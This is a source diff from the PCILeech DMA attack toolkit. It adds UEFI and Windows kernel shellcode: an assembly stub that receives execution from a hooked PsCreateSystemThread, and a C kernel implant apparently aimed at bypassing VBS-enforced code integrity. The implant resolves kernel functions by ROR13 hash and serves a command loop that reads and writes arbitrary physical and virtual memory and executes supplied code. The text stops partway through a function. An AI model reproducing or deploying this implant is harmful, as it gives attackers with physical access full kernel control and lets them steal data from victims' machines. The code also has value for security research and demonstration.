QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
PVOID fn[32]; // [0x300] used by shellcode to store function pointers.
@@ -100,8 +103,8 @@ extern VOID SetMem(
QWORD Value);
extern VOID CopyMem(
- QWORD *Destination,
- QWORD *Source,
+ VOID *Destination,
+ VOID *Source,
QWORD Length);
extern QWORD LocateProtocol(
@@ -158,16 +161,134 @@ typedef struct {
} SIMPLE_TEXT_OUTPUT_MODE;
typedef struct _EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL {
- QWORD Reset;
+ QWORD(*Reset)(QWORD *This, QWORD *ExtendedVerification);
QWORD(*OutputString)(QWORD *This, WCHAR *String);
- QWORD TestString;
- QWORD QueryMode;
- QWORD SetMode;
+ QWORD(*TestString)(QWORD *This, WCHAR *String);
+ QWORD(*QueryMode)(QWORD *This, QWORD ModeNumber, QWORD *Columns, QWORD *Rows);
+ QWORD(*SetMode)(QWORD *This, QWORD ModeNumber);
QWORD(*SetAttribute)(QWORD *This, QWORD Attribute);
QWORD(*ClearScreen)(QWORD *This);
- QWORD SetCursorPosition;
- QWORD EnableCursor;
+ QWORD(*SetCursorPosition)(QWORD *This, QWORD Column, QWORD Row);
+ QWORD(*EnableCursor)(QWORD *This, QWORD Visible);
SIMPLE_TEXT_OUTPUT_MODE *Mode;
} EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL;
+//-------------------------------------------------------------------------------
+// PE / Windows defines below:
+//-------------------------------------------------------------------------------
+
+#define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory
+#define IMAGE_DOS_SIGNATURE 0x5A4D // MZ
+#define IMAGE_NT_SIGNATURE 0x00004550 // PE00
+#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
+#define PIMAGE_NT_HEADERS PIMAGE_NT_HEADERS64
+
+typedef struct _IMAGE_DOS_HEADER {
+ WORD e_magic;
+ WORD e_cblp;
+ WORD e_cp;
+ WORD e_crlc;
+ WORD e_cparhdr;
+ WORD e_minalloc;
+ WORD e_maxalloc;
+ WORD e_ss;
+ WORD e_sp;
+ WORD e_csum;
+ WORD e_ip;
+ WORD e_cs;
+ WORD e_lfarlc;
+ WORD e_ovno;
+ WORD e_res[4];
+ WORD e_oemid;
+ WORD e_oeminfo;
+ WORD e_res2[10];
+ LONG e_lfanew;
+} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
+
+typedef struct _IMAGE_EXPORT_DIRECTORY {
+ DWORD Characteristics;
+ DWORD TimeDateStamp;
+ WORD MajorVersion;
+ WORD MinorVersion;
+ DWORD Name;
+ DWORD Base;
+ DWORD NumberOfFunctions;
+ DWORD NumberOfNames;
+ DWORD AddressOfFunctions;
+ DWORD AddressOfNames;
+ DWORD AddressOfNameOrdinals;
+} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
+
+typedef struct _IMAGE_FILE_HEADER {
+ WORD Machine;
+ WORD NumberOfSections;
+ DWORD TimeDateStamp;
+ DWORD PointerToSymbolTable;
+ DWORD NumberOfSymbols;
+ WORD SizeOfOptionalHeader;
+ WORD Characteristics;
+} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
+
+typedef struct _IMAGE_DATA_DIRECTORY {
+ DWORD VirtualAddress;
+ DWORD Size;
+} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
+
+typedef struct _IMAGE_OPTIONAL_HEADER64 {
+ WORD Magic;
+ BYTE MajorLinkerVersion;
+ BYTE MinorLinkerVersion;
+ DWORD SizeOfCode;
+ DWORD SizeOfInitializedData;
+ DWORD SizeOfUninitializedData;
+ DWORD AddressOfEntryPoint;
+ DWORD BaseOfCode;
+ ULONGLONG ImageBase;
+ DWORD SectionAlignment;
+ DWORD FileAlignment;
+ WORD MajorOperatingSystemVersion;
+ WORD MinorOperatingSystemVersion;
+ WORD MajorImageVersion;
+ WORD MinorImageVersion;
+ WORD MajorSubsystemVersion;
+ WORD MinorSubsystemVersion;
+ DWORD Win32VersionValue;
+ DWORD SizeOfImage;
+ DWORD SizeOfHeaders;
+ DWORD CheckSum;
+ WORD Subsystem;
+ WORD DllCharacteristics;
+ ULONGLONG SizeOfStackReserve;
+ ULONGLONG SizeOfStackCommit;
+ ULONGLONG SizeOfHeapReserve;
+ ULONGLONG SizeOfHeapCommit;
+ DWORD LoaderFlags;
+ DWORD NumberOfRvaAndSizes;
+ IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
+} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
+
+typedef struct _IMAGE_NT_HEADERS64 {
+ DWORD Signature;
+ IMAGE_FILE_HEADER FileHeader;
+ IMAGE_OPTIONAL_HEADER64 OptionalHeader;
+} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;
+
+#define IMAGE_SIZEOF_SHORT_NAME 8
+
+typedef struct _IMAGE_SECTION_HEADER {
+ BYTE Name[IMAGE_SIZEOF_SHORT_NAME];
+ union {
+ DWORD PhysicalAddress;
+ DWORD VirtualSize;
+ } Misc;
+ DWORD VirtualAddress;
+ DWORD SizeOfRawData;
+ DWORD PointerToRawData;
+ DWORD PointerToRelocations;
+ DWORD PointerToLinenumbers;
+ WORD NumberOfRelocations;
+ WORD NumberOfLinenumbers;
+ DWORD Characteristics;
+} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
+
#endif /* __UEFI_COMMON_H__ */
diff --git a/pcileech_shellcode/uefi_kmd_c.c b/pcileech_shellcode/uefi_kmd_c.c
index 733698e..3b10405 100644
--- a/pcileech_shellcode/uefi_kmd_c.c
+++ b/pcileech_shellcode/uefi_kmd_c.c
@@ -101,30 +101,30 @@ typedef struct tdPHYSICAL_MEMORY_RANGE {
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
PVOID fn[32]; // [0x300] used by shellcode to store function pointers.
@@ -230,8 +230,8 @@ VOID c_EntryPoint(PKMDDATA pk, QWORD paUEFI_IBI_SYST)
SetMem((PQWORD)pk, 0x1000, 0);
pk->MAGIC = 0x0ff11337711333377;
pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_UEFI;
- pk->ReservedKMD = paUEFI_IBI_SYST; // Address of UEFI system table
- // 1: allocate memory for buffer
+ pk->ReservedKMD[0] = paUEFI_IBI_SYST; // Address of UEFI system table
+ // 2: allocate memory for buffer
addr = 0xffffffff;
pk->DMASizeBuffer = 0x01000000;
status = AllocatePages(1, EfiBootServicesData, 0x1000, &addr);
@@ -246,9 +246,9 @@ VOID c_EntryPoint(PKMDDATA pk, QWORD paUEFI_IBI_SYST)
}
pk->DMAAddrPhysical = addr;
pk->DMAAddrVirtual = addr;
- // 2: disable any watchdog timer (if exists)
+ // 3: disable any watchdog timer (if exists)
pk->dataOut[2] = SetWatchdogTimer(0, 0, 0, 0);
- // 3: main command loop.
+ // 4: main command loop.
while(TRUE) {
pk->_status = 1;
if (KMD_CMD_COMPLETED == pk->_op) { // NOP
diff --git a/pcileech_shellcode/uefi_textout.c b/pcileech_shellcode/uefi_textout.c
index fa13370..801cf91 100644
--- a/pcileech_shellcode/uefi_textout.c
+++ b/pcileech_shellcode/uefi_textout.c
@@ -7,14 +7,14 @@
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_common.c
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_textout.c
// ml64.exe uefi_common_a.asm /Feuefi_textout.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_textout.obj uefi_common.obj
-// shellcode64.exe -o uefi_textout.exe "UEFI TEST PROGRAM - PRINT STUFF ON THE SCREEN\n===========================================================\nSyntax: pcileech.exe -s \nGENERAL INFORMATION BELOW:\n TEXT : %s\n"
+// shellcode64.exe -o uefi_textout.exe "UEFI TEST PROGRAM - PRINT STUFF ON THE SCREEN\n===========================================================\nSyntax: pcileech.exe uefi_textout\nOptions (optional): \ntext: -s \nposition: -0 1 -1 -2 \nnumber of runs (default=1): -3 \nGENERAL INFORMATION BELOW:\n TEXT : %s\n"
//
#include "uefi_common.h"
VOID c_EntryPoint(PKMDDATA pk)
{
WCHAR szPrint[MAX_PATH];
- CHAR *szSrc, szPrintDefault[] = { ' ', ' ', ' ', 'U', 'E', 'F', 'I', ' ', 'E', 'V', 'I', 'L', ' ', 'I', 'N', ' ', 'B', 'O', 'O', 'T', ' ', 'S', 'E', 'R', 'V', 'I', 'C', 'E', 'S', '!', ' ', ' ', ' ', 0 };
+ CHAR *szSrc, szPrintDefault[] = { ' ', ' ', ' ', ' ', 'U', 'E', 'F', 'I', ' ', 'E', 'V', 'I', 'L', ' ', 'F', 'R', 'O', 'M', ' ', 'P', 'C', 'I', 'L', 'E', 'E', 'C', 'H', '!', ' ', ' ', ' ' , ' ', 0 };
EFI_GUID GUID_EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL = EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL_GUID;
EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL oOut;
EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL *pOut = &oOut;
@@ -27,7 +27,12 @@ VOID c_EntryPoint(PKMDDATA pk)
}
pk->dataOut[0] = efi_status = LocateProtocol(&GUID_EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL, NULL, (QWORD**)&pOut);
if(!efi_status) {
+ if(pk->dataIn[0]) {
+ pOut->SetCursorPosition((QWORD*)pOut, pk->dataIn[1], pk->dataIn[2]);
+ }
pOut->SetAttribute((QWORD*)pOut, EFI_BACKGROUND_RED | EFI_CYAN);
- pOut->OutputString((QWORD*)pOut, szPrint);
+ for(i = 0; i < max(1, pk->dataIn[3]); i++) {
+ pOut->OutputString((QWORD*)pOut, szPrint);
+ }
}
}
diff --git a/pcileech_shellcode/uefi_winload_ntos_kmd.asm b/pcileech_shellcode/uefi_winload_ntos_kmd.asm
new file mode 100644
index 0000000..0075efe
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_kmd.asm
@@ -0,0 +1,88 @@
+; uefi_winload_ntos_kmd.asm : assembly to receive execution from hooked function PsCreateSystemThread at end of execution (instead of RET)
+;
+; (c) Ulf Frisk, 2017
+; Author: Ulf Frisk, pcileech@frizk.net
+;
+
+EXTRN c_EntryPoint:NEAR
+
+.CODE
+
+main PROC
+ JMP main_setup
+main ENDP
+
+data_trigger_count db 00h, 00h ; offset 0x02
+addr_base_ntos dd 00000000h ; offset 0x04
+addr_this dd 00000000h ; offset 0x08
+addr_sym0 dd 00000000h ; offset 0x0c
+addr_sym1 dd 00000000h ; offset 0x10
+addr_sym2 dd 00000000h ; offset 0x14
+
+main_setup PROC
+ PUSH rax
+ ; ----------------------------------------------------
+ ; only continue of running at IRQL PASSIVE_LEVEL
+ ; ----------------------------------------------------
+ MOV rax, cr8
+ TEST al, al
+ JNZ main_setup_exit
+ ; ----------------------------------------------------
+ ; save registers (14regs)
+ ; ----------------------------------------------------
+ PUSH rbx
+ PUSH rcx
+ PUSH rdx
+ PUSH rdi
+ PUSH rsi
+ PUSH r8
+ PUSH r9
+ PUSH r10
+ PUSH r11
+ PUSH r12
+ PUSH r13
+ PUSH r14
+ PUSH r15
+ PUSH rbp
+ ; ----------------------------------------------------
+ ; fetch ntos base, vfs addr, cr3, align stack, jump to c-code
+ ; ----------------------------------------------------
+ LEA rcx, [main]
+ MOV eax, [addr_this]
+ SUB rcx, rax
+ MOV eax, [addr_base_ntos]
+ ADD rcx, rax
+ LEA rdx, [main]
+ MOV r8, cr3
+ MOV r15, rsp
+ SUB rsp, 100h
+ SHR rsp, 4
+ SHL rsp, 4
+ CALL c_EntryPoint
+ MOV rsp, r15
+ ; ----------------------------------------------------
+ ; restore registers
+ ; ----------------------------------------------------
+ POP rbp
+ POP r15
+ POP r14
+ POP r13
+ POP r12
+ POP r11
+ POP r10
+ POP r9
+ POP r8
+ POP rsi
+ POP rdi
+ POP rdx
+ POP rcx
+ POP rbx
+ ; ----------------------------------------------------
+ ; return
+ ; ----------------------------------------------------
+ main_setup_exit:
+ POP rax
+ RET
+main_setup ENDP
+
+END
diff --git a/pcileech_shellcode/uefi_winload_ntos_kmd_c.c b/pcileech_shellcode/uefi_winload_ntos_kmd_c.c
new file mode 100644
index 0000000..abbcd65
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_kmd_c.c
@@ -0,0 +1,431 @@
+// uefi_winload_ntos_kmd_c.c : special kmd for use in pre-patched ntoskrnl.exe with VBS enforced code integrity
+//
+// (planned to be used in demo at 34c3)
+//
+// (c) Ulf Frisk, 2017
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+// compile with:
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_kmd_c.c
+// ml64.exe uefi_winload_ntos_kmd.asm /Feuefi_winload_ntos_kmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_kmd_c.obj
+// shellcode64.exe -o uefi_winload_ntos_kmd.exe
+//
+#include
+#pragma warning( disable : 4047 4055 4127)
+
+typedef unsigned __int64 QWORD, *PQWORD;
+typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
+
+// ----------------------------- KERNEL DEFINES AND TYPEDEFS BELOW -----------------------------
+
+typedef struct _CLIENT_ID {
+ HANDLE UniqueProcess;
+ HANDLE UniqueThread;
+} CLIENT_ID;
+typedef CLIENT_ID *PCLIENT_ID;
+
+typedef _IRQL_requires_same_ _Function_class_(KSTART_ROUTINE) VOID KSTART_ROUTINE(
+ _In_ PVOID StartContext
+);
+typedef KSTART_ROUTINE *PKSTART_ROUTINE;
+
+typedef struct _UNICODE_STRING {
+ USHORT Length;
+ USHORT MaximumLength;
+ _Field_size_bytes_part_(MaximumLength, Length) PWCH Buffer;
+} UNICODE_STRING;
+typedef UNICODE_STRING *PUNICODE_STRING;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ ULONG Length;
+ HANDLE RootDirectory;
+ PUNICODE_STRING ObjectName;
+ ULONG Attributes;
+ PVOID SecurityDescriptor;
+ PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES;
+typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
+typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES;
+
+typedef enum _MEMORY_CACHING_TYPE {
+ MmNonCached = 0,
+ MmCached = 1,
+ MmWriteCombined = 2,
+ MmHardwareCoherentCached = 3,
+ MmNonCachedUnordered = 4,
+ MmUSWCCached = 5,
+ MmMaximumCacheType = 6
+} MEMORY_CACHING_TYPE;
+
+typedef struct _PHYSICAL_MEMORY_RANGE {
+ PHYSICAL_ADDRESS BaseAddress;
+ LARGE_INTEGER NumberOfBytes;
+} PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;
+
+typedef enum _MODE {
+ KernelMode,
+ UserMode,
+ MaximumMode
+} MODE;
+
+// ----------------------------- ROR13 HASHES BELOW -----------------------------
+
+#define H_ExFreePool 0x9d489d1f
+#define H_MmAllocateContiguousMemory 0x9f361ebc
+#define H_MmFreeContiguousMemory 0x1345f592
+#define H_MmGetPhysicalAddress 0x5a326357
+#define H_MmGetPhysicalMemoryRanges 0x4977a56f
+#define H_MmMapIoSpace 0x05ddbef9
+#define H_MmUnmapIoSpace 0x6c6ec5c9
+#define H_PsCreateSystemThread 0x94a06b02
+#define H_RtlCopyMemory 0xcf64979b
+#define H_RtlZeroMemory 0xc53d4fdb
+#define H_ZwProtectVirtualMemory 0xbc3f4d89
+#define H_KeDelayExecutionThread 0x58586d92
+#define H_RtlZeroMemory 0xc53d4fdb
+
+// ----------------------------- SHELLCODE DEFINES AND TYPEDEFS BELOW (STAGE2) -----------------------------
+
+#undef RtlCopyMemory
+#undef RtlZeroMemory
+typedef struct tdNTOS {
+ VOID(*ExFreePool)(
+ _In_ PVOID P
+ );
+ VOID(*MmFreeContiguousMemory)(
+ _In_ PVOID BaseAddress
+ );
+ PVOID(*MmAllocateContiguousMemory)(
+ _In_ SIZE_T NumberOfBytes,
+ _In_ PHYSICAL_ADDRESS HighestAcceptableAddress
+ );
+ PHYSICAL_ADDRESS(*MmGetPhysicalAddress)(
+ _In_ PVOID BaseAddress
+ );
+ PPHYSICAL_MEMORY_RANGE(*MmGetPhysicalMemoryRanges)(
+ VOID
+ );
+ PVOID(*MmMapIoSpace)(
+ _In_ PHYSICAL_ADDRESS PhysicalAddress,
+ _In_ SIZE_T NumberOfBytes,
+ _In_ MEMORY_CACHING_TYPE CacheType
+ );
+ VOID(*MmUnmapIoSpace)(
+ _In_ PVOID BaseAddress,
+ _In_ SIZE_T NumberOfBytes
+ );
+ NTSTATUS(*PsCreateSystemThread)(
+ _Out_ PHANDLE ThreadHandle,
+ _In_ ULONG DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_opt_ HANDLE ProcessHandle,
+ _Out_opt_ PCLIENT_ID ClientId,
+ _In_ PKSTART_ROUTINE StartRoutine,
+ _In_opt_ PVOID StartContext
+ );
+ VOID(*RtlCopyMemory)(
+ _Out_ VOID UNALIGNED *Destination,
+ _In_ const VOID UNALIGNED *Source,
+ _In_ SIZE_T Length
+ );
+ NTSTATUS(*ZwProtectVirtualMemory)(
+ _In_ HANDLE ProcessHandle,
+ _Inout_ PVOID *BaseAddress,
+ _Inout_ PSIZE_T RegionSize,
+ _In_ ULONG NewProtect,
+ _Out_ PULONG OldProtect
+ );
+ NTSTATUS(*KeDelayExecutionThread)(
+ _In_ MODE WaitMode,
+ _In_ BOOLEAN Alertable,
+ _In_ PINT64 pllInterval_Neg100ns
+ );
+ QWORD ReservedFutureUse[21];
+} NTOS, *PNTOS;
+
+#define KMDDATA_OPERATING_SYSTEM_WINDOWS 0x01
+#define KMDDATA_MAGIC 0xff11337711333377
+
+/*
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
+*/
+typedef struct tdKMDDATA {
+ QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
+ QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
+ QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
+ QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
+ QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
+ QWORD _status; // [0x030] status of operation
+ QWORD _result; // [0x038] result of operation TRUE|FALSE
+ QWORD _address; // [0x040] address to operate on.
+ QWORD _size; // [0x048] size of operation / data in DMA buffer.
+ QWORD OperatingSystem; // [0x050] operating system type
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
+ QWORD dataInExtraLength; // [0x100] length of extra in-data.
+ QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
+ QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
+ QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
+ QWORD dataIn[28]; // [0x120]
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
+ QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
+ QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
+ QWORD dataOut[28]; // [0x220]
+ NTOS fn; // [0x300] used by shellcode to store function pointers.
+ CHAR dataInStr[MAX_PATH]; // [0x400] string in-data
+ CHAR ReservedFutureUse2[252];
+ CHAR dataOutStr[MAX_PATH]; // [0x600] string out-data
+ CHAR ReservedFutureUse3[252];
+ QWORD ReservedFutureUse4[255]; // [0x800]
+ QWORD _op; // [0xFF8] (op is last 8 bytes in 4k-page)
+} KMDDATA, *PKMDDATA;
+
+// ----------------------------- SHELLCODE FUNCTIONS BELOW (STAGE2) -----------------------------
+
+DWORD HashROR13A(_In_ LPCSTR sz)
+{
+ DWORD dwVal, dwHash = 0;
+ while(*sz) {
+ dwVal = (DWORD)*sz++;
+ dwHash = (dwHash >> 13) | (dwHash << 19);
+ dwHash += dwVal;
+ }
+ return dwHash;
+}
+
+/*
+* Lookup a function and return it, if found.
+* -- hModule
+* -- dwProcNameH
+* -- return
+*/
+QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
+{
+ PDWORD pdwRVAAddrNames, pdwRVAAddrFunctions;
+ PWORD pwNameOrdinals;
+ DWORD i, dwFnIdx, dwHash;
+ LPSTR sz;
+ PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+ PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+ PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule);
+ pdwRVAAddrNames = (PDWORD)(hModule + exp->AddressOfNames);
+ pwNameOrdinals = (PWORD)(hModule + exp->AddressOfNameOrdinals);
+ pdwRVAAddrFunctions = (PDWORD)(hModule + exp->AddressOfFunctions);
+ for(i = 0; i < exp->NumberOfNames; i++) {
+ sz = (LPSTR)(hModule + pdwRVAAddrNames[i]);
+ dwHash = HashROR13A(sz);
+ if(dwHash == dwProcNameH) {
+ dwFnIdx = pwNameOrdinals[i];
+ if(dwFnIdx >= exp->NumberOfFunctions) { return 0; }
+ return hModule + pdwRVAAddrFunctions[dwFnIdx];
+ }
+ }
+ return 0;
+}
+
+#define KMD_CMD_VOID 0xffff
+#define KMD_CMD_COMPLETED 0
+#define KMD_CMD_READ 1
+#define KMD_CMD_WRITE 2
+#define KMD_CMD_TERMINATE 3
+#define KMD_CMD_MEM_INFO 4
+#define KMD_CMD_EXEC 5
+#define KMD_CMD_READ_VA 6
+#define KMD_CMD_WRITE_VA 7
+#define KMD_CMD_EXEC_EXTENDED 8
+
+// status:
+// 1: ready for command
+// 2: processing
+// f0000000: terminated
+// f0000000+: error
+// op: - see KMD_CMD defines
+// result:
+// 0: FALSE
+// 1: TRUE
+// address:
+// physical base address for memory operation
+// size:
+// size of memory operation
+VOID stage3_c_MainCommandLoop(PKMDDATA pk)
+{
+ LONGLONG llTimeToWait = -10000; // 1000 uS (negative multiples of 100ns)
+ PVOID pvBufferOutDMA;
+ PPHYSICAL_MEMORY_RANGE pMemMap;
+ PVOID pvMM = NULL;
+ QWORD i, idleCount = 0;
+ // 1: set up mem out dma area 16MB//4MB in lower 4GB
+ pk->DMASizeBuffer = 0x1000000;
+ pvBufferOutDMA = pk->fn.MmAllocateContiguousMemory(0x01000000, 0xffffffff);
+ if(!pvBufferOutDMA) {
+ pk->DMASizeBuffer = 0x00400000;
+ pvBufferOutDMA = pk->fn.MmAllocateContiguousMemory(0x00400000, 0xffffffff);
+ }
+ if(!pvBufferOutDMA) {
+ pk->DMASizeBuffer = 0;
+ pk->_status = 0xf0000001;
+ return;
+ }
+ pk->DMAAddrVirtual = (QWORD)pvBufferOutDMA;
+ pk->DMAAddrPhysical = pk->fn.MmGetPhysicalAddress(pvBufferOutDMA);
+ // 2: main dump loop
+ while(TRUE) {
+ pk->_status = 1;
+ if(KMD_CMD_COMPLETED == pk->_op) { // NOP
+ idleCount++;
+ // thread wait after X number of idle loops - TODO: change to timing
+ if(idleCount > 10000000000) {
+ pk->fn.KeDelayExecutionThread(KernelMode, FALSE, &llTimeToWait);
+ }
+ continue;
+ }
+ pk->_status = 2;
+ if(KMD_CMD_TERMINATE == pk->_op) { // EXIT
+ pk->_status = 0xf0000000;
+ pk->fn.MmFreeContiguousMemory(pvBufferOutDMA);
+ pk->DMAAddrPhysical = 0;
+ pk->DMAAddrVirtual = 0;
+ pk->_result = TRUE;
+ pk->MAGIC = 0;
+ pk->_op = KMD_CMD_COMPLETED;
+ return;
+ }
+ if(KMD_CMD_MEM_INFO == pk->_op) { // INFO (physical section map)
+ pMemMap = pk->fn.MmGetPhysicalMemoryRanges();
+ if(pMemMap == NULL) {
+ pk->_result = FALSE;
+ } else {
+ for(i = 0; (pMemMap[i].BaseAddress) || (pMemMap[i].NumberOfBytes.QuadPart); i++);
+ pk->_size = i * sizeof(PHYSICAL_MEMORY_RANGE);
+ pk->fn.RtlCopyMemory(pvBufferOutDMA, pMemMap, pk->_size);
+ pk->fn.ExFreePool(pMemMap);
+ pk->_result = TRUE;
+ }
+ }
+ if(KMD_CMD_EXEC == pk->_op) { // EXEC at start of buffer
+ if(pk->dataIn[9]) {
+ // PSCMD_KERNEL
+ ((VOID(*)(PKMDDATA))pk->ReservedKMD[1])(pk);
+ pk->_result = TRUE;
+ } else {
+ // VFS
+ ((VOID(*)(PKMDDATA))pk->ReservedKMD[0])(pk);
+ pk->_result = TRUE;
+ }
+ }
+ if(KMD_CMD_READ == pk->_op || KMD_CMD_WRITE == pk->_op) { // PHYSICAL MEMORY READ/WRITE
+ if(pk->dataIn[9] == 0) {
+ pvMM = NULL; // no memory read if vfs (might crash the system accidentally)
+ } else {
+ pvMM = pk->fn.MmMapIoSpace(pk->_address, pk->_size, 0);
+ }
+ if(pvMM) {
+ if(KMD_CMD_READ == pk->_op) { // READ
+ pk->fn.RtlCopyMemory(pvBufferOutDMA, pvMM, pk->_size);
+ } else { // WRITE
+ pk->fn.RtlCopyMemory(pvMM, pvBufferOutDMA, pk->_size);
+ }
+ pk->fn.MmUnmapIoSpace(pvMM, pk->_size);
+ pk->_result = TRUE;
+ } else {
+ pk->_result = FALSE;
+ }
+ }
+ if(KMD_CMD_READ_VA == pk->_op) { // READ Virtual Address
+ pk->fn.RtlCopyMemory(pvBufferOutDMA, (PVOID)pk->_address, pk->_size);
+ pk->_result = TRUE;
+ }
+ if(KMD_CMD_WRITE_VA == pk->_op) { // WRITE Virtual Address
+ pk->fn.RtlCopyMemory((PVOID)pk->_address, pvBufferOutDMA, pk->_size);
+ pk->_result = TRUE;
+ }
+ pk->_op = KMD_CMD_COMPLETED;
+ idleCount = 0;
+ }
+}
+
+#define DATA_OFFSET_TRIGGER_COUNT 0x02
+#define DATA_OFFSET_KMD_THIS 0x08
+#define DATA_OFFSET_VFS 0x0c
+#define DATA_OFFSET_PSCMD_KERNEL 0x10
+#define DATA_OFFSET_PSCMD_USER 0x14
+VOID c_EntryPoint_Thread(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase)
+{
+ PVOID(*MmMapIoSpace)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE);
+ VOID(*MmUnmapIoSpace)(PVOID, SIZE_T);
